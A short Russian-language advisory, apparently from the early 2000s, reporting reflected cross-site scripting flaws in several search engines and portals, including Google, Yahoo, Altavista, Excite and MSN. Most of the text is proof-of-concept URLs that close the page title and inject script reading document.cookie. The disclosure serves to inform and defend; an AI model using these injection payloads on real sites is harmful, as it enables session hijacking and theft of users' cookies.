Обнаружена возможность Cross Site Scriptingа во
многих популярных поисковых системах,
таких как Google, Altavista, Excite.com,Yahoo и так далее. В
данном случае скрипты выполняются внутри
искомого тега < title>.

Metacrawler.com
http://www.metacrawler.com/info.metac/search/web/
%253C%252Ftitle%253E%253Cbody%2Bbgcolor% 253D%2522blue%2522%253E%253Cscript%253
Ealert(document.cookie)%253B%253C%252Fscrip t%253E%253C%252Fbody%253E

Excite.com
http://msxml.excite.com/info.xcite/search/web/
%25253C%25252Ftitle%25253E%25253Cbody %252Bbgcolor%25253D%252522blue%252
522%25253E%25253Cscript%25253Ealert% 252528document.cookie%252529%25253B%
25253C%25252Fscript%25253E%25253C %25252Fbody%25253E

Downloads.com
http://www.download.com/3120-20-0.html?qt=
%3C%2Ftitle%3E%3Cbody+bgcolor%3D%22blue
%22%3E%3Cscript%3Ealert%28document.cookie %29%3B%3C%2Fscript%3E%3 C%2Fbody%3E&tg=dl-2001

DogPile.com
http://www.dogpile.com/info.dogpl/search/ web/%253C%252Ftitle%253E%253Cbody%2
Bbgcolor%253D%2522blue%2522%253E%253 Cscript%253Ealert(document.cookie)%253B%
253C%52Fscript%253E%253C%252Fbody%253E

Google.com
http://googlesite.google.com/search?output= googleabout&site=googlesite&q=%3Cscript%3
Ealert%28document.cookie%29%3B%3C%2Fscript%3E

Altavista.com
http://www.altavista.com/web/results?q=> <body%20bgcolor="blue"><script>alert(document.cookie);
</script></body>

Yahoo.com
http://us.rd.yahoo.com/reg/sc/nav/*http://www.%20 <script>alert(document.cookie);</script>

MSN.com [пофиксено]
http://local.msn.com/results.asp?ec=&zip=</script> <script>alert(document.cookie);</script><script>

Оставить мнение